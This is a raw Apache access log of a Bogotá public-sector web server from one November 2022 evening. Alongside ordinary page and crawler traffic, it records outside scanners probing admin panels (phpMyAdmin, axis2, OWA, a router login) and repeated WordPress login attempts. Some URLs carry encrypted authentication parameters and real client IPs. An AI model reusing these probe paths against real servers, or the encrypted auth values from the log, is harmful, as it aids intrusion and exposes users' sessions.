172.22.2.4 - - [07/Nov/2022:21:34:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49689
85.31.46.211 - - [07/Nov/2022:21:36:17 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
172.22.2.4 - - [07/Nov/2022:21:35:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
106.75.79.238 - - [07/Nov/2022:21:37:16 -0500] "GET /portaldeninos/favicon.ico HTTP/1.1" 404 14448
106.75.79.238 - - [07/Nov/2022:21:37:17 -0500] "GET /portaldeninos/sitemap.xml HTTP/1.1" 404 14448
40.77.51.85 - - [07/Nov/2022:21:37:22 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/imagenes-con-marcos-pa%CC%81gina-de-nin%CC%83os-parque-los-nevados.jpg HTTP/1.1" 200 48675
106.75.79.238 - - [07/Nov/2022:21:38:17 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
106.75.79.238 - - [07/Nov/2022:21:38:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
106.75.79.238 - - [07/Nov/2022:21:38:23 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
106.75.79.238 - - [07/Nov/2022:21:38:23 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
106.75.79.238 - - [07/Nov/2022:21:38:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
106.75.79.238 - - [07/Nov/2022:21:38:25 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
106.75.79.238 - - [07/Nov/2022:21:38:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
106.75.79.238 - - [07/Nov/2022:21:38:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
172.22.2.4 - - [07/Nov/2022:21:38:26 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
106.75.79.238 - - [07/Nov/2022:21:38:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
106.75.79.238 - - [07/Nov/2022:21:38:25 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
106.75.79.238 - - [07/Nov/2022:21:38:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
106.75.79.238 - - [07/Nov/2022:21:38:27 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
106.75.79.238 - - [07/Nov/2022:21:38:27 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
106.75.79.238 - - [07/Nov/2022:21:38:28 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
106.75.79.238 - - [07/Nov/2022:21:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
106.75.79.238 - - [07/Nov/2022:21:38:29 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
106.75.79.238 - - [07/Nov/2022:21:38:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
106.75.79.238 - - [07/Nov/2022:21:38:30 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
106.75.79.238 - - [07/Nov/2022:21:38:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
106.75.79.238 - - [07/Nov/2022:21:38:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
106.75.79.238 - - [07/Nov/2022:21:38:35 -0500] "GET /portaldeninos/sitemap.xml HTTP/1.1" 404 14449
40.77.167.57 - - [07/Nov/2022:21:38:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/5856.pdf HTTP/1.1" 304 -
216.245.221.92 - - [07/Nov/2022:21:38:48 -0500] "HEAD / HTTP/1.1" 200 -
106.75.79.238 - - [07/Nov/2022:21:39:37 -0500] "GET /axis2-admin/ HTTP/1.1" 404 1035
106.75.79.238 - - [07/Nov/2022:21:39:37 -0500] "GET /axis2/ HTTP/1.1" 404 1035
106.75.79.238 - - [07/Nov/2022:21:39:38 -0500] "GET /axis2/axis2-admin/ HTTP/1.1" 404 1035
106.75.79.238 - - [07/Nov/2022:21:39:39 -0500] "GET /pma/index.php HTTP/1.1" 404 1035
106.75.79.238 - - [07/Nov/2022:21:39:39 -0500] "GET /phpmyadmin/index.php HTTP/1.1" 403 1182
106.75.79.238 - - [07/Nov/2022:21:39:40 -0500] "GET /PhpMyAdmin/index.php HTTP/1.1" 403 1182
106.75.79.238 - - [07/Nov/2022:21:39:40 -0500] "GET /php/thinkphp/aaaffff123.php HTTP/1.1" 404 1035
106.75.79.238 - - [07/Nov/2022:21:39:41 -0500] "GET /index_sso.php HTTP/1.1" 404 1035
66.249.73.94 - - [07/Nov/2022:21:39:43 -0500] "-" 408 -
201.245.192.253 - - [07/Nov/2022:21:41:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43647
201.245.192.253 - - [07/Nov/2022:21:41:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42191
185.119.81.100 - - [07/Nov/2022:21:41:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:21:41:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [07/Nov/2022:21:41:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
40.77.167.69 - - [07/Nov/2022:21:41:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
40.77.167.69 - - [07/Nov/2022:21:41:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
40.77.167.69 - - [07/Nov/2022:21:41:48 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
40.77.167.69 - - [07/Nov/2022:21:41:48 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
40.77.167.46 - - [07/Nov/2022:21:41:51 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
40.77.167.46 - - [07/Nov/2022:21:41:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
40.77.167.46 - - [07/Nov/2022:21:41:52 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
40.77.167.46 - - [07/Nov/2022:21:41:52 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
157.55.39.15 - - [07/Nov/2022:21:41:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
207.46.13.131 - - [07/Nov/2022:21:41:55 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
40.77.167.33 - - [07/Nov/2022:21:41:56 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
40.77.167.33 - - [07/Nov/2022:21:41:56 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
40.77.167.41 - - [07/Nov/2022:21:42:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
40.77.167.41 - - [07/Nov/2022:21:42:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
40.77.167.41 - - [07/Nov/2022:21:42:02 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
172.22.2.4 - - [07/Nov/2022:21:40:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.15 - - [07/Nov/2022:21:42:06 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
114.119.141.53 - - [07/Nov/2022:21:42:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4098.pdf HTTP/1.1" 200 338396
207.46.13.131 - - [07/Nov/2022:21:42:15 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
207.46.13.131 - - [07/Nov/2022:21:42:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
172.22.2.4 - - [07/Nov/2022:21:41:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
181.61.209.2 - - [07/Nov/2022:21:43:19 -0500] "GET /vota-por-bogota-en-we-love-cities-pioneros-en-sostenibilidad.html HTTP/1.1" 200 850
216.245.221.92 - - [07/Nov/2022:21:43:48 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.92 - - [07/Nov/2022:21:45:43 -0500] "-" 408 -
201.245.192.253 - - [07/Nov/2022:21:46:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
201.245.192.253 - - [07/Nov/2022:21:46:35 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12180
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [07/Nov/2022:21:46:36 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
173.252.127.119 - - [07/Nov/2022:21:46:48 -0500] "GET /images/Reciclaton%20Nov%202022%20(1)%20(1).jpeg HTTP/1.1" 200 53811
172.22.2.4 - - [07/Nov/2022:21:46:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:21:48:34 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [07/Nov/2022:21:48:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
172.22.2.4 - - [07/Nov/2022:21:47:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [07/Nov/2022:21:48:48 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:21:51:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
40.77.51.81 - - [07/Nov/2022:21:53:03 -0500] "GET /galeria/galeria/fotos/juan-amarillo3P.jpg HTTP/1.1" 200 28033
172.22.2.4 - - [07/Nov/2022:21:52:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Nov/2022:21:53:48 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:21:52:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [07/Nov/2022:21:56:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
186.31.122.176 - - [07/Nov/2022:21:57:57 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/5656.pdf HTTP/1.1" 200 391092
216.245.221.92 - - [07/Nov/2022:21:58:48 -0500] "HEAD / HTTP/1.1" 200 -
186.31.122.176 - - [07/Nov/2022:21:59:09 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/3127.pdf HTTP/1.1" 200 409523
172.22.2.4 - - [07/Nov/2022:21:59:31 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [07/Nov/2022:21:57:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:21:58:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [07/Nov/2022:22:01:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
94.102.61.10 - - [07/Nov/2022:22:01:05 -0500] "GET / HTTP/1.1" 200 319
185.119.81.100 - - [07/Nov/2022:22:02:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:22:02:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
186.31.122.176 - - [07/Nov/2022:22:03:13 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/5261.pdf HTTP/1.1" 200 352929
216.245.221.92 - - [07/Nov/2022:22:03:48 -0500] "HEAD / HTTP/1.1" 200 -
186.102.35.50 - - [07/Nov/2022:22:04:04 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1993SzobPS5ECluP4x7/aFTqD5l2gd8IMGUi0v6KoQL697DGcqIJxl6&y=U2FsdGVkX1+3+95lv0yEQILjGPbpUxFykE6oNBz6x/mmyGJBOt6pU4YA462oB+En HTTP/1.1" 200 30
186.102.35.50 - - [07/Nov/2022:22:04:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19+KuDe4JSr6TIQk3VwGnm+EEuzNUoUjEw6MnDxLHgw50zYlyitDGxBOQiGLe2b4MudT42fe5tshGqDmCaESIm4He+eZF+aunE=&u=U2FsdGVkX18ylbxjOKVJnx5EAH539eC4vYBLUnicd3M=&y=U2FsdGVkX1+3+95lv0yEQILjGPbpUxFykE6oNBz6x/mmyGJBOt6pU4YA462oB+En HTTP/1.1" 200 97
186.102.35.50 - - [07/Nov/2022:22:04:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+ZzuOeVl7y+aBRtAUyjLYs2rkg0IO1G/y/zwY84N42uUvMFiYff6cs+2UB7TBPfUw5xNhZfR1iB9YsaENOKYgKME5PwUduuu3Hi3ZfE/ETbgucmTQJNoEbKEzVls4NAGSre0pR/De4v6MVXewm3yDveMuT/hrt7casVKzzSvF2cgObrPKX69qASXg8//tEhjoieDaHbE+0m1UFSwllcs79zgqHS07cT7AThuz7TcByEqwmMUVgiupWtrncVZlKsUhgythZygWGnwejFIvy2bMrpGlJ0jh9RTW62ydKnObP64JaUkWlgsa40Uh/RQmQZ0MudWUiL4a6gAG5sNbTNh/x51Y6V8zFv+sCROYUqOgnLGthYDsKc+0JuDSalpa2unNcPsOOHccd49XXBPkwibfhJgMn/mh4U9Bc9gVqpkNjTxyMFRMLh6k9t2m9P010zIqHEXxtF3iS1fLYQLksqGjqdmLxDA86Stgy1NETCzZYwRHpTqavHepuCs61uYAbGv16YakZ1D1BECe+oQeDO4pmgNX4DSMqT3fD+njy5w3giInYoASNUqLBdQ6hzWWho84dA8rF7rPofG2lboli8kgavCDL/9dIOWFoyL0GKVa4CgxkgCnTeElCJewqZYCcf3QF+sPFElL0o1adsdG/VrVPUuSc8VmPvvFs8G//a7iEuSWo5qIayFqLOTsO+cIQOhomowpnvfjJcZFnW5JaGWEw7WhO5WA3pw7weOs1ME4yqbD3Wsy95FUI7kTEiTqtuxyqlHIExV8AJgq3ssb2GD/X5qF9B4JbVVtHctFxtCXrtMYVOG9cxddcapz5K0u4MGitsT7V+tDIy3jR9r0LkIWAvYYdtgRPBN+Hk2/n80WZ9Min7qi3d1yusN5bK/VNYEZ+70sxI5QjgLy+/4AwV50zdumUT9lcuVqa0S4GmqYfUWBMuTt5F1tiSK+nNpbZC4LmnT0IcAQaDCUPeyj4FhfbHWLNBPxi7hljfHz/sXPMYFy8F19B7HZFIiBwjEqyT+USjBuL8cvRf4ImICtHypKlM/7dWv74N2n6nDYK6X//2nWX0bF38rSacCZFKIMskTHAE2ewNH52yVZy7584M2IZxauysDcVQtz3X5snpw33JMpCvBrWKAp2k9m5CNBHEJIY8t4E9hLhy0rW9gUnjcv5R8mnztE/nQYaw36wSuYizzr13SCuLGbuuAhQ4XF0uCAyZuTFWkHSAiO4FWFQ8Y/CsVsFauhkXaP1l1IgUq/XkDyFkvQ2Zq5h67pYeUUyFuNMiWoCGLOPYQ0NlSpOIFb6kMn/GINpoX4h30fPlN8mBCwcHBWw2stCiCFdFG2UoOFciBryKijLVLD+ItlhGbN9xeMEHbppHnEP373yECmbAZ1cmg3D/dHZyxz2x7mpO6WoFNb7o2PsXwaCm+HcyjoMHWk5JUslE1k=&u=U2FsdGVkX18ylbxjOKVJnx5EAH539eC4vYBLUnicd3M=&y=U2FsdGVkX1+3+95lv0yEQILjGPbpUxFykE6oNBz6x/mmyGJBOt6pU4YA462oB+En HTTP/1.1" 200 522
186.102.35.50 - - [07/Nov/2022:22:04:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18znhmxCbsBwsk+C73srqeANSXrJ7e3TCyvDhBjUBvdD/LLeSLxfhpNAcv4yb+AxehlJdkKOBWnqwT63FCFN105ovwnnwhdaJl0HPdUi/PGB6JLoDIijlHcWrFUC/di6Oh3Gpw2l47xfPsY2zl94z1tlxtuF8zHJaDo/RYt3k6B+XSaFzvtXIZhnU9FQU9rP0n3Ykg5nK0r9Qwzr/1NTdtfCcObKBcajWfRu6oPnqtpbi8oHVpTeqRC8yf0ugn+YcSnQXV21cvwOT7NVzetN5Qvx0iStRbt344H1BmXWow8FaWBJiCg+Tnrp/CpvaE40Skjo2PqfTnMNQ==&u=U2FsdGVkX18ylbxjOKVJnx5EAH539eC4vYBLUnicd3M=&y=U2FsdGVkX1+3+95lv0yEQILjGPbpUxFykE6oNBz6x/mmyGJBOt6pU4YA462oB+En HTTP/1.1" 200 327
186.102.35.50 - - [07/Nov/2022:22:04:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=9&x=U2FsdGVkX1993SzobPS5ECluP4x7/aFTqD5l2gd8IMGUi0v6KoQL697DGcqIJxl6 HTTP/1.1" 200 25142
186.102.35.50 - - [07/Nov/2022:22:04:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=18&x=U2FsdGVkX1993SzobPS5ECluP4x7/aFTqD5l2gd8IMGUi0v6KoQL697DGcqIJxl6 HTTP/1.1" 200 32849
186.31.122.176 - - [07/Nov/2022:22:04:12 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/5033.pdf HTTP/1.1" 200 2901119
172.22.2.4 - - [07/Nov/2022:22:03:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.69 - - [07/Nov/2022:22:05:50 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
190.84.119.147 - - [07/Nov/2022:22:05:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 406613
201.245.192.253 - - [07/Nov/2022:22:06:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:22:04:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
114.119.141.42 - - [07/Nov/2022:22:08:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2480.pdf HTTP/1.1" 200 281237
216.245.221.92 - - [07/Nov/2022:22:08:48 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.69 - - [07/Nov/2022:22:09:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0172.pdf HTTP/1.1" 200 446764
20.198.221.121 - - [07/Nov/2022:22:10:34 -0500] "GET /wp-admin/css/ HTTP/1.1" 404 1128
20.198.221.121 - - [07/Nov/2022:22:10:39 -0500] "GET /.well-known/ HTTP/1.1" 404 1128
20.198.221.121 - - [07/Nov/2022:22:10:49 -0500] "GET /sites/default/files/ HTTP/1.1" 404 1128
172.22.2.4 - - [07/Nov/2022:22:09:17 -0500] "HEAD /BLA/boletinlegal/index.php HTTP/1.1" 200 -
20.198.221.121 - - [07/Nov/2022:22:11:01 -0500] "GET /admin/controller/extension/extension/ HTTP/1.1" 404 1128
201.245.192.253 - - [07/Nov/2022:22:11:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
20.198.221.121 - - [07/Nov/2022:22:11:06 -0500] "GET /uploads/ HTTP/1.1" 404 1128
20.198.221.121 - - [07/Nov/2022:22:11:11 -0500] "GET /images/ HTTP/1.1" 200 493
172.22.2.4 - - [07/Nov/2022:22:09:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
20.198.221.121 - - [07/Nov/2022:22:11:16 -0500] "GET /files/ HTTP/1.1" 404 1128
172.22.2.4 - - [07/Nov/2022:22:10:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48352
185.119.81.100 - - [07/Nov/2022:22:12:11 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Nov/2022:22:12:12 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [07/Nov/2022:22:10:37 -0500] "HEAD /BLA/boletinlegal/index.php HTTP/1.1" 200 -
190.27.128.131 - - [07/Nov/2022:22:12:38 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
216.245.221.92 - - [07/Nov/2022:22:13:48 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Nov/2022:22:16:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [07/Nov/2022:22:15:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:22:16:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
186.29.154.67 - - [07/Nov/2022:22:18:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 577485
216.245.221.92 - - [07/Nov/2022:22:18:48 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [07/Nov/2022:22:20:35 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4829
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/ajax.js HTTP/1.1" 200 577
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/js/ajax_documentos.js HTTP/1.1" 200 1155
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/images/nuevo.gif HTTP/1.1" 200 26475
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/textarea-r-off.png HTTP/1.1" 200 266
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/textarea-tr.png HTTP/1.1" 200 488
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/textarea-tl.png HTTP/1.1" 200 269
172.22.2.4 - - [07/Nov/2022:22:20:39 -0500] "GET /BLA/boletinlegal/img/textarea-l-off.png HTTP/1.1" 200 168
